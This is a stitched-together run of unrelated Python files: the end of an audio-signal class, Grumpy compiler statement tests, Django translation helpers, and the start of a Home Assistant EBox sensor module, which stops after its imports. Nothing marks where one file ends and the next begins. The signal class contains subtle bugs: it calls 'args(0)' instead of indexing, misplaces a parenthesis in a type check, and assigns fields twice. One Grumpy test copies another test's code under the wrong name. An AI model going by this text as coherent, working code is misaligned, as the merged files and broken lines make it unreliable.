        self.sLength, self.nChans = self.s.shape

    def LoadWF(self, waveform, fs):
        self.s = waveform
        self.fs = fs
        self.sLength, self.nChans = self.s.shape
    
    def __init__(self, *args):
        
        #signal properties
        self.singlePrecision = 0
        self.s = np.array([])
        self.fs = 44100
        self.sLength = 0
        self.nChans = 0
        self.weightingFunction = np.hamming #FIXME
        
        #STFT properties
        self.S = np.array([])
        self.windowLength = 60
        self.nfft = 0
        self.nfftUtil = 0
        self.overlapRatio = 0.5
        self.framesPositions = np.array([])
        self.nFrames = 0
        self.weightingWindow = np.array([])
        self.overlap = 0
        

        # Windowing properties
        self.sWin = np.array([])
        self.sWeights = np.array([])
        self.sWin = np.array([])
        self.sWeights = np.array([])
        
        
        if len(args) == 1:
            if type(args[0]) == type(''): # it's a filename
                self.LoadFromFile(args[0])
            elif type(args[0] == type(self)): # copy data from other signal
                self.__dict__ = copy.deepcopy(args[0].__dict__)
                    
        elif len(args) == 2: # args[0] is a signal, args[1] is sample freq.
            self.LoadWF(args(0), args(1))



# coding=utf-8

# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Tests for StatementVisitor."""

from __future__ import unicode_literals

import re
import subprocess
import textwrap
import unittest

from grumpy_tools.compiler import block
from grumpy_tools.compiler import imputil
from grumpy_tools.compiler import shard_test
from grumpy_tools.compiler import stmt
from grumpy_tools.compiler import util
from grumpy_tools.vendor import pythonparser
from grumpy_tools.vendor.pythonparser import ast


class StatementVisitorTest(unittest.TestCase):

  def testAssertNoMsg(self):
    self.assertEqual((0, 'AssertionError()\n'), _GrumpRun(textwrap.dedent("""\
        try:
          assert False
        except AssertionError as e:
          print repr(e)""")))

  def testAssertMsg(self):
    want = (0, "AssertionError('foo',)\n")
    self.assertEqual(want, _GrumpRun(textwrap.dedent("""\
        try:
          assert False, 'foo'
        except AssertionError as e:
          print repr(e)""")))

  def testBareAssert(self):
    # Assertion errors at the top level of a block should raise:
    # https://github.com/google/grumpy/issues/18
    want = (0, 'ok\n')
    self.assertEqual(want, _GrumpRun(textwrap.dedent("""\
        def foo():
         assert False
        try:
         foo()
        except AssertionError:
         print 'ok'
        else:
         print 'bad'""")))

  def testAssignAttribute(self):
    self.assertEqual((0, '123\n'), _GrumpRun(textwrap.dedent("""\
        e = Exception()
        e.foo = 123
        print e.foo""")))

  def testAssignName(self):
    self.assertEqual((0, 'bar\n'), _GrumpRun(textwrap.dedent("""\
        foo = 'bar'
        print foo""")))

  def testAssignMultiple(self):
    self.assertEqual((0, 'baz baz\n'), _GrumpRun(textwrap.dedent("""\
        foo = bar = 'baz'
        print foo, bar""")))

  def testAssignSubscript(self):
    self.assertEqual((0, "{'bar': None}\n"), _GrumpRun(textwrap.dedent("""\
        foo = {}
        foo['bar'] = None
        print foo""")))

  def testAssignTuple(self):
    self.assertEqual((0, 'a b\n'), _GrumpRun(textwrap.dedent("""\
        baz = ('a', 'b')
        foo, bar = baz
        print foo, bar""")))

  def testAugAssign(self):
    self.assertEqual((0, '42\n'), _GrumpRun(textwrap.dedent("""\
        foo = 41
        foo += 1
        print foo""")))

  def testAugAssignBitAnd(self):
    self.assertEqual((0, '3\n'), _GrumpRun(textwrap.dedent("""\
        foo = 7
        foo &= 3
        print foo""")))

  def testAugAssignPow(self):
    self.assertEqual((0, '64\n'), _GrumpRun(textwrap.dedent("""\
        foo = 8
        foo **= 2
        print foo""")))

  def testClassDef(self):
    self.assertEqual((0, "<type 'type'>\n"), _GrumpRun(textwrap.dedent("""\
        class Foo(object):
          pass
        print type(Foo)""")))

  def testClassDefWithVar(self):
    self.assertEqual((0, 'abc\n'), _GrumpRun(textwrap.dedent("""\
        class Foo(object):
          bar = 'abc'
        print Foo.bar""")))

  def testDeleteAttribute(self):
    self.assertEqual((0, 'False\n'), _GrumpRun(textwrap.dedent("""\
        class Foo(object):
          bar = 42
        del Foo.bar
        print hasattr(Foo, 'bar')""")))

  def testDeleteClassLocal(self):
    self.assertEqual((0, 'False\n'), _GrumpRun(textwrap.dedent("""\
        class Foo(object):
          bar = 'baz'
          del bar
        print hasattr(Foo, 'bar')""")))

  def testDeleteGlobal(self):
    self.assertEqual((0, 'False\n'), _GrumpRun(textwrap.dedent("""\
        foo = 42
        del foo
        print 'foo' in globals()""")))

  def testDeleteLocal(self):
    self.assertEqual((0, 'ok\n'), _GrumpRun(textwrap.dedent("""\
        def foo():
          bar = 123
          del bar
          try:
            print bar
            raise AssertionError
          except UnboundLocalError:
            print 'ok'
        foo()""")))

  def testDeleteNonexistentLocal(self):
    self.assertRaisesRegexp(
        util.ParseError, 'cannot delete nonexistent local',
        _ParseAndVisit, 'def foo():\n  del bar')

  def testDeleteSubscript(self):
    self.assertEqual((0, '{}\n'), _GrumpRun(textwrap.dedent("""\
        foo = {'bar': 'baz'}
        del foo['bar']
        print foo""")))

  def testExprCall(self):
    self.assertEqual((0, 'bar\n'), _GrumpRun(textwrap.dedent("""\
        def foo():
          print 'bar'
        foo()""")))

  def testExprNameGlobal(self):
    self.assertEqual((0, ''), _GrumpRun(textwrap.dedent("""\
        foo = 42
        foo""")))

  def testExprNameLocal(self):
    self.assertEqual((0, ''), _GrumpRun(textwrap.dedent("""\
        foo = 42
        def bar():
          foo
        bar()""")))

  def testFor(self):
    self.assertEqual((0, '1\n2\n3\n'), _GrumpRun(textwrap.dedent("""\
        for i in (1, 2, 3):
          print i""")))

  def testForBreak(self):
    self.assertEqual((0, '1\n'), _GrumpRun(textwrap.dedent("""\
        for i in (1, 2, 3):
          print i
          break""")))

  def testForContinue(self):
    self.assertEqual((0, '1\n2\n3\n'), _GrumpRun(textwrap.dedent("""\
        for i in (1, 2, 3):
          print i
          continue
          raise AssertionError""")))

  def testForElse(self):
    self.assertEqual((0, 'foo\nbar\n'), _GrumpRun(textwrap.dedent("""\
        for i in (1,):
          print 'foo'
        else:
          print 'bar'""")))

  def testForElseBreakNotNested(self):
    self.assertRaisesRegexp(
        util.ParseError, "'continue' not in loop",
        _ParseAndVisit, 'for i in (1,):\n  pass\nelse:\n  continue')

  def testForElseContinueNotNested(self):
    self.assertRaisesRegexp(
        util.ParseError, "'continue' not in loop",
        _ParseAndVisit, 'for i in (1,):\n  pass\nelse:\n  continue')

  def testFunctionDecorator(self):
    self.assertEqual((0, '<b>foo</b>\n'), _GrumpRun(textwrap.dedent("""\
        def bold(fn):
          return lambda: '<b>' + fn() + '</b>'
        @bold
        def foo():
          return 'foo'
        print foo()""")))

  def testFunctionDecoratorWithArg(self):
    self.assertEqual((0, '<b id=red>foo</b>\n'), _GrumpRun(textwrap.dedent("""\
        def tag(name):
          def bold(fn):
            return lambda: '<b id=' + name + '>' + fn() + '</b>'
          return bold
        @tag('red')
        def foo():
          return 'foo'
        print foo()""")))

  def testFunctionDef(self):
    self.assertEqual((0, 'bar baz\n'), _GrumpRun(textwrap.dedent("""\
        def foo(a, b):
          print a, b
        foo('bar', 'baz')""")))

  def testFunctionDefGenerator(self):
    self.assertEqual((0, "['foo', 'bar']\n"), _GrumpRun(textwrap.dedent("""\
        def gen():
          yield 'foo'
          yield 'bar'
        print list(gen())""")))

  def testFunctionDefGeneratorReturnValue(self):
    self.assertRaisesRegexp(
        util.ParseError, 'returning a value in a generator function',
        _ParseAndVisit, 'def foo():\n  yield 1\n  return 2')

  def testFunctionDefLocal(self):
    self.assertEqual((0, 'baz\n'), _GrumpRun(textwrap.dedent("""\
        def foo():
          def bar():
            print 'baz'
          bar()
        foo()""")))

  def testIf(self):
    self.assertEqual((0, 'foo\n'), _GrumpRun(textwrap.dedent("""\
        if 123:
          print 'foo'
        if '':
          print 'bar'""")))

  def testIfElif(self):
    self.assertEqual((0, 'foo\nbar\n'), _GrumpRun(textwrap.dedent("""\
        if True:
          print 'foo'
        elif False:
          print 'bar'
        if False:
          print 'foo'
        elif True:
          print 'bar'""")))

  def testIfElse(self):
    self.assertEqual((0, 'foo\nbar\n'), _GrumpRun(textwrap.dedent("""\
        if True:
          print 'foo'
        else:
          print 'bar'
        if False:
          print 'foo'
        else:
          print 'bar'""")))

  def testImport(self):
    self.assertEqual((0, "<type 'dict'>\n"), _GrumpRun(textwrap.dedent("""\
        import sys
        print type(sys.modules)""")))

  def testImportFutureLateRaises(self):
    regexp = 'from __future__ imports must occur at the beginning of the file'
    self.assertRaisesRegexp(util.ImportError, regexp, _ParseAndVisit,
                            'foo = bar\nfrom __future__ import print_function')

  def testFutureUnicodeLiterals(self):
    want = "u'foo'\n"
    self.assertEqual((0, want), _GrumpRun(textwrap.dedent("""\
        from __future__ import unicode_literals
        print repr('foo')""")))

  def testImportMember(self):
    self.assertEqual((0, "<type 'dict'>\n"), _GrumpRun(textwrap.dedent("""\
        from sys import modules
        print type(modules)""")))

  def testImportConflictingPackage(self):
    self.assertEqual((0, ''), _GrumpRun(textwrap.dedent("""\
        import time
        from "__go__/time" import Now""")))

  def testImportNative(self):
    self.assertEqual((0, '1 1000000000\n'), _GrumpRun(textwrap.dedent("""\
        from "__go__/time" import Nanosecond, Second
        print Nanosecond, Second""")))

  def testImportGrumpy(self):
    self.assertEqual((0, ''), _GrumpRun(textwrap.dedent("""\
        from "__go__/grumpy" import Assert
        Assert(__frame__(), True, 'bad')""")))

  def testImportNativeType(self):
    self.assertEqual((0, "<type 'Duration'>\n"), _GrumpRun(textwrap.dedent("""\
        from "__go__/time" import Duration
        print Duration""")))

  def testImportWildcardMemberRaises(self):
    regexp = 'wildcard member import is not implemented'
    self.assertRaisesRegexp(util.ImportError, regexp, _ParseAndVisit,
                            'from foo import *')
    self.assertRaisesRegexp(util.ImportError, regexp, _ParseAndVisit,
                            'from "__go__/foo" import *')

  def testPrintStatement(self):
    self.assertEqual((0, 'abc 123\nfoo bar\n'), _GrumpRun(textwrap.dedent("""\
        print 'abc',
        print '123'
        print 'foo', 'bar'""")))

  def testPrintFunction(self):
    want = "abc\n123\nabc 123\nabcx123\nabc 123 "
    self.assertEqual((0, want), _GrumpRun(textwrap.dedent("""\
        "module docstring is ok to proceed __future__"
        from __future__ import print_function
        print('abc')
        print(123)
        print('abc', 123)
        print('abc', 123, sep='x')
        print('abc', 123, end=' ')""")))

  def testRaiseExitStatus(self):
    self.assertEqual(1, _GrumpRun('raise Exception')[0])

  def testRaiseInstance(self):
    self.assertEqual((0, 'foo\n'), _GrumpRun(textwrap.dedent("""\
        try:
          raise RuntimeError('foo')
          print 'bad'
        except RuntimeError as e:
          print e""")))

  def testRaiseTypeAndArg(self):
    self.assertEqual((0, 'foo\n'), _GrumpRun(textwrap.dedent("""\
        try:
          raise KeyError('foo')
          print 'bad'
        except KeyError as e:
          print e""")))

  def testRaiseAgain(self):
    self.assertEqual((0, 'foo\n'), _GrumpRun(textwrap.dedent("""\
        try:
          try:
            raise AssertionError('foo')
          except AssertionError:
            raise
        except Exception as e:
          print e""")))

  def testRaiseTraceback(self):
    self.assertEqual((0, ''), _GrumpRun(textwrap.dedent("""\
        import sys
        try:
          try:
            raise Exception
          except:
            e, _, tb = sys.exc_info()
            raise e, None, tb
        except:
          e2, _, tb2 = sys.exc_info()
        assert e is e2
        assert tb is tb2""")))

  def testReturn(self):
    self.assertEqual((0, 'bar\n'), _GrumpRun(textwrap.dedent("""\
        def foo():
          return 'bar'
        print foo()""")))

  def testTryBareExcept(self):
    self.assertEqual((0, ''), _GrumpRun(textwrap.dedent("""\
        try:
          raise AssertionError
        except:
          pass""")))

  def testTryElse(self):
    self.assertEqual((0, 'foo baz\n'), _GrumpRun(textwrap.dedent("""\
        try:
          print 'foo',
        except:
          print 'bar'
        else:
          print 'baz'""")))

  def testTryMultipleExcept(self):
    self.assertEqual((0, 'bar\n'), _GrumpRun(textwrap.dedent("""\
        try:
          raise AssertionError
        except RuntimeError:
          print 'foo'
        except AssertionError:
          print 'bar'
        except:
          print 'baz'""")))

  def testTryFinally(self):
    result = _GrumpRun(textwrap.dedent("""\
        try:
          print 'foo',
        finally:
          print 'bar'
        try:
          print 'foo',
          raise Exception
        finally:
          print 'bar'"""))
    self.assertEqual(1, result[0])
    self.assertIn('foo bar\nfoo bar\n', result[1])
    self.assertIn('Exception\n', result[1])

  def testWhile(self):
    self.assertEqual((0, '2\n1\n'), _GrumpRun(textwrap.dedent("""\
        i = 2
        while i:
          print i
          i -= 1""")))

  def testWhileElse(self):
    self.assertEqual((0, 'bar\n'), _GrumpRun(textwrap.dedent("""\
        while False:
          print 'foo'
        else:
          print 'bar'""")))

  def testWith(self):
    self.assertEqual((0, 'enter\n1\nexit\nenter\n2\nexit\n3\n'),
                     _GrumpRun(textwrap.dedent("""\
        class ContextManager(object):
          def __enter__(self):
            print "enter"

          def __exit__(self, exc_type, value, traceback):
            print "exit"

        a = ContextManager()

        with a:
          print 1

        try:
          with a:
            print 2
            raise RuntimeError
        except RuntimeError:
          print 3
        """)))

  def testWithAs(self):
    self.assertEqual((0, '1 2 3\n'),
                     _GrumpRun(textwrap.dedent("""\
        class ContextManager(object):
          def __enter__(self):
            return (1, (2, 3))
          def __exit__(self, *args):
            pass
        with ContextManager() as [x, (y, z)]:
          print x, y, z
        """)))

  def testWriteExceptDispatcherBareExcept(self):
    visitor = stmt.StatementVisitor(_MakeModuleBlock())
    handlers = [ast.ExceptHandler(type=ast.Name(id='foo')),
                ast.ExceptHandler(type=None)]
    self.assertEqual(visitor._write_except_dispatcher(  # pylint: disable=protected-access
        'exc', 'tb', handlers), [1, 2])
    expected = re.compile(r'ResolveGlobal\(.*foo.*\bIsInstance\(.*'
                          r'goto Label1.*goto Label2', re.DOTALL)
    self.assertRegexpMatches(visitor.writer.getvalue(), expected)

  def testWriteExceptDispatcherBareExceptionNotLast(self):
    visitor = stmt.StatementVisitor(_MakeModuleBlock())
    handlers = [ast.ExceptHandler(type=None),
                ast.ExceptHandler(type=ast.Name(id='foo'))]
    self.assertRaisesRegexp(util.ParseError, r"default 'except:' must be last",
                            visitor._write_except_dispatcher,  # pylint: disable=protected-access
                            'exc', 'tb', handlers)

  def testWriteExceptDispatcherMultipleExcept(self):
    visitor = stmt.StatementVisitor(_MakeModuleBlock())
    handlers = [ast.ExceptHandler(type=ast.Name(id='foo')),
                ast.ExceptHandler(type=ast.Name(id='bar'))]
    self.assertEqual(visitor._write_except_dispatcher(  # pylint: disable=protected-access
        'exc', 'tb', handlers), [1, 2])
    expected = re.compile(
        r'ResolveGlobal\(.*foo.*\bif .*\bIsInstance\(.*\{.*goto Label1.*'
        r'ResolveGlobal\(.*bar.*\bif .*\bIsInstance\(.*\{.*goto Label2.*'
        r'\bRaise\(exc\.ToObject\(\), nil, tb\.ToObject\(\)\)', re.DOTALL)
    self.assertRegexpMatches(visitor.writer.getvalue(), expected)


def _MakeModuleBlock():
  return block.ModuleBlock(None, '__main__', '<test>', '',
                           imputil.FutureFeatures())


def _ParseAndVisit(source):
  mod = pythonparser.parse(source)
  _, future_features = imputil.parse_future_features(mod)
  importer = imputil.Importer(None, 'foo', 'foo.py', False)
  b = block.ModuleBlock(importer, '__main__', '<test>',
                        source, future_features)
  visitor = stmt.StatementVisitor(b)
  visitor.visit(mod)
  return visitor


def _GrumpRun(cmd):
  p = subprocess.Popen(['grumpy', 'run'], stdin=subprocess.PIPE,
                       stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
  out, _ = p.communicate(cmd)
  return p.returncode, out


if __name__ == '__main__':
  shard_test.main()

"""Translation helper functions."""

import locale
import os
import re
import sys
import gettext as gettext_module
from cStringIO import StringIO

from django.utils.importlib import import_module
from django.utils.safestring import mark_safe, SafeData
from django.utils.thread_support import currentThread

# Translations are cached in a dictionary for every language+app tuple.
# The active translations are stored by threadid to make them thread local.
_translations = {}
_active = {}

# The default translation is based on the settings file.
_default = None

# This is a cache for normalized accept-header languages to prevent multiple
# file lookups when checking the same locale on repeated requests.
_accepted = {}

# Format of Accept-Language header values. From RFC 2616, section 14.4 and 3.9.
accept_language_re = re.compile(r'''
        ([A-Za-z]{1,8}(?:-[A-Za-z]{1,8})*|\*)   # "en", "en-au", "x-y-z", "*"
        (?:;q=(0(?:\.\d{,3})?|1(?:.0{,3})?))?   # Optional "q=1.00", "q=0.8"
        (?:\s*,\s*|$)                            # Multiple accepts per header.
        ''', re.VERBOSE)

def to_locale(language, to_lower=False):
    """
    Turns a language name (en-us) into a locale name (en_US). If 'to_lower' is
    True, the last component is lower-cased (en_us).
    """
    p = language.find('-')
    if p >= 0:
        if to_lower:
            return language[:p].lower()+'_'+language[p+1:].lower()
        else:
            return language[:p].lower()+'_'+language[p+1:].upper()
    else:
        return language.lower()

def to_language(locale):
    """Turns a locale name (en_US) into a language name (en-us)."""
    p = locale.find('_')
    if p >= 0:
        return locale[:p].lower()+'-'+locale[p+1:].lower()
    else:
        return locale.lower()

class DjangoTranslation(gettext_module.GNUTranslations):
    """
    This class sets up the GNUTranslations context with regard to output
    charset. Django uses a defined DEFAULT_CHARSET as the output charset on
    Python 2.4. With Python 2.3, use DjangoTranslation23.
    """
    def __init__(self, *args, **kw):
        from django.conf import settings
        gettext_module.GNUTranslations.__init__(self, *args, **kw)
        # Starting with Python 2.4, there's a function to define
        # the output charset. Before 2.4, the output charset is
        # identical with the translation file charset.
        try:
            self.set_output_charset('utf-8')
        except AttributeError:
            pass
        self.django_output_charset = 'utf-8'
        self.__language = '??'

    def merge(self, other):
        self._catalog.update(other._catalog)

    def set_language(self, language):
        self.__language = language

    def language(self):
        return self.__language

    def __repr__(self):
        return "<DjangoTranslation lang:%s>" % self.__language

class DjangoTranslation23(DjangoTranslation):
    """
    Compatibility class that is only used with Python 2.3.
    Python 2.3 doesn't support set_output_charset on translation objects and
    needs this wrapper class to make sure input charsets from translation files
    are correctly translated to output charsets.

    With a full switch to Python 2.4, this can be removed from the source.
    """
    def gettext(self, msgid):
        res = self.ugettext(msgid)
        return res.encode(self.django_output_charset)

    def ngettext(self, msgid1, msgid2, n):
        res = self.ungettext(msgid1, msgid2, n)
        return res.encode(self.django_output_charset)

def translation(language):
    """
    Returns a translation object.

    This translation object will be constructed out of multiple GNUTranslations
    objects by merging their catalogs. It will construct a object for the
    requested language and add a fallback to the default language, if it's
    different from the requested language.
    """
    global _translations

    t = _translations.get(language, None)
    if t is not None:
        return t

    from django.conf import settings

    # set up the right translation class
    klass = DjangoTranslation
    if sys.version_info < (2, 4):
        klass = DjangoTranslation23

    globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')

    if settings.SETTINGS_MODULE is not None:
        parts = settings.SETTINGS_MODULE.split('.')
        project = import_module(parts[0])
        projectpath = os.path.join(os.path.dirname(project.__file__), 'locale')
    else:
        projectpath = None

    def _fetch(lang, fallback=None):

        global _translations

        loc = to_locale(lang)

        res = _translations.get(lang, None)
        if res is not None:
            return res

        def _translation(path):
            try:
                t = gettext_module.translation('django', path, [loc], klass)
                t.set_language(lang)
                return t
            except IOError, e:
                return None

        res = _translation(globalpath)

        # We want to ensure that, for example,  "en-gb" and "en-us" don't share
        # the same translation object (thus, merging en-us with a local update
        # doesn't affect en-gb), even though they will both use the core "en"
        # translation. So we have to subvert Python's internal gettext caching.
        base_lang = lambda x: x.split('-', 1)[0]
        if base_lang(lang) in [base_lang(trans) for trans in _translations]:
            res._info = res._info.copy()
            res._catalog = res._catalog.copy()

        def _merge(path):
            t = _translation(path)
            if t is not None:
                if res is None:
                    return t
                else:
                    res.merge(t)
            return res

        for localepath in settings.LOCALE_PATHS:
            if os.path.isdir(localepath):
                res = _merge(localepath)

        if projectpath and os.path.isdir(projectpath):
            res = _merge(projectpath)

        for appname in settings.INSTALLED_APPS:
            app = import_module(appname)
            apppath = os.path.join(os.path.dirname(app.__file__), 'locale')

            if os.path.isdir(apppath):
                res = _merge(apppath)

        if res is None:
            if fallback is not None:
                res = fallback
            else:
                return gettext_module.NullTranslations()
        _translations[lang] = res
        return res

    default_translation = _fetch(settings.LANGUAGE_CODE)
    current_translation = _fetch(language, fallback=default_translation)

    return current_translation

def activate(language):
    """
    Fetches the translation object for a given tuple of application name and
    language and installs it as the current translation object for the current
    thread.
    """
    _active[currentThread()] = translation(language)

def deactivate():
    """
    Deinstalls the currently active translation object so that further _ calls
    will resolve against the default translation object, again.
    """
    global _active
    if currentThread() in _active:
        del _active[currentThread()]

def deactivate_all():
    """
    Makes the active translation object a NullTranslations() instance. This is
    useful when we want delayed translations to appear as the original string
    for some reason.
    """
    _active[currentThread()] = gettext_module.NullTranslations()

def get_language():
    """Returns the currently selected language."""
    t = _active.get(currentThread(), None)
    if t is not None:
        try:
            return to_language(t.language())
        except AttributeError:
            pass
    # If we don't have a real translation object, assume it's the default language.
    from django.conf import settings
    return settings.LANGUAGE_CODE

def get_language_bidi():
    """
    Returns selected language's BiDi layout.
    False = left-to-right layout
    True = right-to-left layout
    """
    from django.conf import settings
    
    base_lang = get_language().split('-')[0]
    return base_lang in settings.LANGUAGES_BIDI

def catalog():
    """
    Returns the current active catalog for further processing.
    This can be used if you need to modify the catalog or want to access the
    whole message catalog instead of just translating one string.
    """
    global _default, _active
    t = _active.get(currentThread(), None)
    if t is not None:
        return t
    if _default is None:
        from django.conf import settings
        _default = translation(settings.LANGUAGE_CODE)
    return _default

def do_translate(message, translation_function):
    """
    Translates 'message' using the given 'translation_function' name -- which
    will be either gettext or ugettext. It uses the current thread to find the
    translation object to use. If no current translation is activated, the
    message will be run through the default translation object.
    """
    global _default, _active
    t = _active.get(currentThread(), None)
    if t is not None:
        result = getattr(t, translation_function)(message)
    else:
        if _default is None:
            from django.conf import settings
            _default = translation(settings.LANGUAGE_CODE)
        result = getattr(_default, translation_function)(message)
    if isinstance(message, SafeData):
        return mark_safe(result)
    return result

def gettext(message):
    return do_translate(message, 'gettext')

def ugettext(message):
    return do_translate(message, 'ugettext')

def gettext_noop(message):
    """
    Marks strings for translation but doesn't translate them now. This can be
    used to store strings in global variables that should stay in the base
    language (because they might be used externally) and will be translated
    later.
    """
    return message

def do_ntranslate(singular, plural, number, translation_function):
    global _default, _active

    t = _active.get(currentThread(), None)
    if t is not None:
        return getattr(t, translation_function)(singular, plural, number)
    if _default is None:
        from django.conf import settings
        _default = translation(settings.LANGUAGE_CODE)
    return getattr(_default, translation_function)(singular, plural, number)

def ngettext(singular, plural, number):
    """
    Returns a UTF-8 bytestring of the translation of either the singular or
    plural, based on the number.
    """
    return do_ntranslate(singular, plural, number, 'ngettext')

def ungettext(singular, plural, number):
    """
    Returns a unicode strings of the translation of either the singular or
    plural, based on the number.
    """
    return do_ntranslate(singular, plural, number, 'ungettext')

def check_for_language(lang_code):
    """
    Checks whether there is a global language file for the given language
    code. This is used to decide whether a user-provided language is
    available. This is only used for language codes from either the cookies or
    session.
    """
    from django.conf import settings
    globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
    if gettext_module.find('django', globalpath, [to_locale(lang_code)]) is not None:
        return True
    else:
        return False

def get_language_from_request(request):
    """
    Analyzes the request to find what language the user wants the system to
    show. Only languages listed in settings.LANGUAGES are taken into account.
    If the user requests a sublanguage where we have a main language, we send
    out the main language.
    """
    global _accepted
    from django.conf import settings
    globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
    supported = dict(settings.LANGUAGES)

    if hasattr(request, 'session'):
        lang_code = request.session.get('django_language', None)
        if lang_code in supported and lang_code is not None and check_for_language(lang_code):
            return lang_code

    lang_code = request.COOKIES.get(settings.LANGUAGE_COOKIE_NAME)
    if lang_code and lang_code in supported and check_for_language(lang_code):
        return lang_code

    accept = request.META.get('HTTP_ACCEPT_LANGUAGE', '')
    for accept_lang, unused in parse_accept_lang_header(accept):
        if accept_lang == '*':
            break

        # We have a very restricted form for our language files (no encoding
        # specifier, since they all must be UTF-8 and only one possible
        # language each time. So we avoid the overhead of gettext.find() and
        # work out the MO file manually.

        # 'normalized' is the root name of the locale in POSIX format (which is
        # the format used for the directories holding the MO files).
        normalized = locale.locale_alias.get(to_locale(accept_lang, True))
        if not normalized:
            continue
        # Remove the default encoding from locale_alias.
        normalized = normalized.split('.')[0]

        if normalized in _accepted:
            # We've seen this locale before and have an MO file for it, so no
            # need to check again.
            return _accepted[normalized]

        for lang, dirname in ((accept_lang, normalized),
                (accept_lang.split('-')[0], normalized.split('_')[0])):
            if lang.lower() not in supported:
                continue
            langfile = os.path.join(globalpath, dirname, 'LC_MESSAGES',
                    'django.mo')
            if os.path.exists(langfile):
                _accepted[normalized] = lang
                return lang

    return settings.LANGUAGE_CODE

def get_date_formats():
    """
    Checks whether translation files provide a translation for some technical
    message ID to store date and time formats. If it doesn't contain one, the
    formats provided in the settings will be used.
    """
    from django.conf import settings
    date_format = ugettext('DATE_FORMAT')
    datetime_format = ugettext('DATETIME_FORMAT')
    time_format = ugettext('TIME_FORMAT')
    if date_format == 'DATE_FORMAT':
        date_format = settings.DATE_FORMAT
    if datetime_format == 'DATETIME_FORMAT':
        datetime_format = settings.DATETIME_FORMAT
    if time_format == 'TIME_FORMAT':
        time_format = settings.TIME_FORMAT
    return date_format, datetime_format, time_format

def get_partial_date_formats():
    """
    Checks whether translation files provide a translation for some technical
    message ID to store partial date formats. If it doesn't contain one, the
    formats provided in the settings will be used.
    """
    from django.conf import settings
    year_month_format = ugettext('YEAR_MONTH_FORMAT')
    month_day_format = ugettext('MONTH_DAY_FORMAT')
    if year_month_format == 'YEAR_MONTH_FORMAT':
        year_month_format = settings.YEAR_MONTH_FORMAT
    if month_day_format == 'MONTH_DAY_FORMAT':
        month_day_format = settings.MONTH_DAY_FORMAT
    return year_month_format, month_day_format

dot_re = re.compile(r'\S')
def blankout(src, char):
    """
    Changes every non-whitespace character to the given char.
    Used in the templatize function.
    """
    return dot_re.sub(char, src)

inline_re = re.compile(r"""^\s*trans\s+((?:".*?")|(?:'.*?'))\s*""")
block_re = re.compile(r"""^\s*blocktrans(?:\s+|$)""")
endblock_re = re.compile(r"""^\s*endblocktrans$""")
plural_re = re.compile(r"""^\s*plural$""")
constant_re = re.compile(r"""_\(((?:".*?")|(?:'.*?'))\)""")

def templatize(src):
    """
    Turns a Django template into something that is understood by xgettext. It
    does so by translating the Django translation tags into standard gettext
    function invocations.
    """
    from django.template import Lexer, TOKEN_TEXT, TOKEN_VAR, TOKEN_BLOCK
    out = StringIO()
    intrans = False
    inplural = False
    singular = []
    plural = []
    for t in Lexer(src, None).tokenize():
        if intrans:
            if t.token_type == TOKEN_BLOCK:
                endbmatch = endblock_re.match(t.contents)
                pluralmatch = plural_re.match(t.contents)
                if endbmatch:
                    if inplural:
                        out.write(' ngettext(%r,%r,count) ' % (''.join(singular), ''.join(plural)))
                        for part in singular:
                            out.write(blankout(part, 'S'))
                        for part in plural:
                            out.write(blankout(part, 'P'))
                    else:
                        out.write(' gettext(%r) ' % ''.join(singular))
                        for part in singular:
                            out.write(blankout(part, 'S'))
                    intrans = False
                    inplural = False
                    singular = []
                    plural = []
                elif pluralmatch:
                    inplural = True
                else:
                    raise SyntaxError("Translation blocks must not include other block tags: %s" % t.contents)
            elif t.token_type == TOKEN_VAR:
                if inplural:
                    plural.append('%%(%s)s' % t.contents)
                else:
                    singular.append('%%(%s)s' % t.contents)
            elif t.token_type == TOKEN_TEXT:
                if inplural:
                    plural.append(t.contents)
                else:
                    singular.append(t.contents)
        else:
            if t.token_type == TOKEN_BLOCK:
                imatch = inline_re.match(t.contents)
                bmatch = block_re.match(t.contents)
                cmatches = constant_re.findall(t.contents)
                if imatch:
                    g = imatch.group(1)
                    if g[0] == '"': g = g.strip('"')
                    elif g[0] == "'": g = g.strip("'")
                    out.write(' gettext(%r) ' % g)
                elif bmatch:
                    for fmatch in constant_re.findall(t.contents):
                        out.write(' _(%s) ' % fmatch)
                    intrans = True
                    inplural = False
                    singular = []
                    plural = []
                elif cmatches:
                    for cmatch in cmatches:
                        out.write(' _(%s) ' % cmatch)
                else:
                    out.write(blankout(t.contents, 'B'))
            elif t.token_type == TOKEN_VAR:
                parts = t.contents.split('|')
                cmatch = constant_re.match(parts[0])
                if cmatch:
                    out.write(' _(%s) ' % cmatch.group(1))
                for p in parts[1:]:
                    if p.find(':_(') >= 0:
                        out.write(' %s ' % p.split(':',1)[1])
                    else:
                        out.write(blankout(p, 'F'))
            else:
                out.write(blankout(t.contents, 'X'))
    return out.getvalue()

def parse_accept_lang_header(lang_string):
    """
    Parses the lang_string, which is the body of an HTTP Accept-Language
    header, and returns a list of (lang, q-value), ordered by 'q' values.

    Any format errors in lang_string results in an empty list being returned.
    """
    result = []
    pieces = accept_language_re.split(lang_string)
    if pieces[-1]:
        return []
    for i in range(0, len(pieces) - 1, 3):
        first, lang, priority = pieces[i : i + 3]
        if first:
            return []
        priority = priority and float(priority) or 1.0
        result.append((lang, priority))
    result.sort(lambda x, y: -cmp(x[1], y[1]))
    return result

"""
Support for EBox.

Get data from 'My Usage Page' page: https://client.ebox.ca/myusage

For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.ebox/
"""
import logging
from datetime import timedelta

import voluptuous as vol

import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
    CONF_USERNAME,
    CONF_PASSWORD,
    CONF_NAME,
    CONF_MONITORED_VARIABLES,
)
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
from homeassistant.exceptions import PlatformNotReady


_LOGGER = logging.getLogger(__name__)

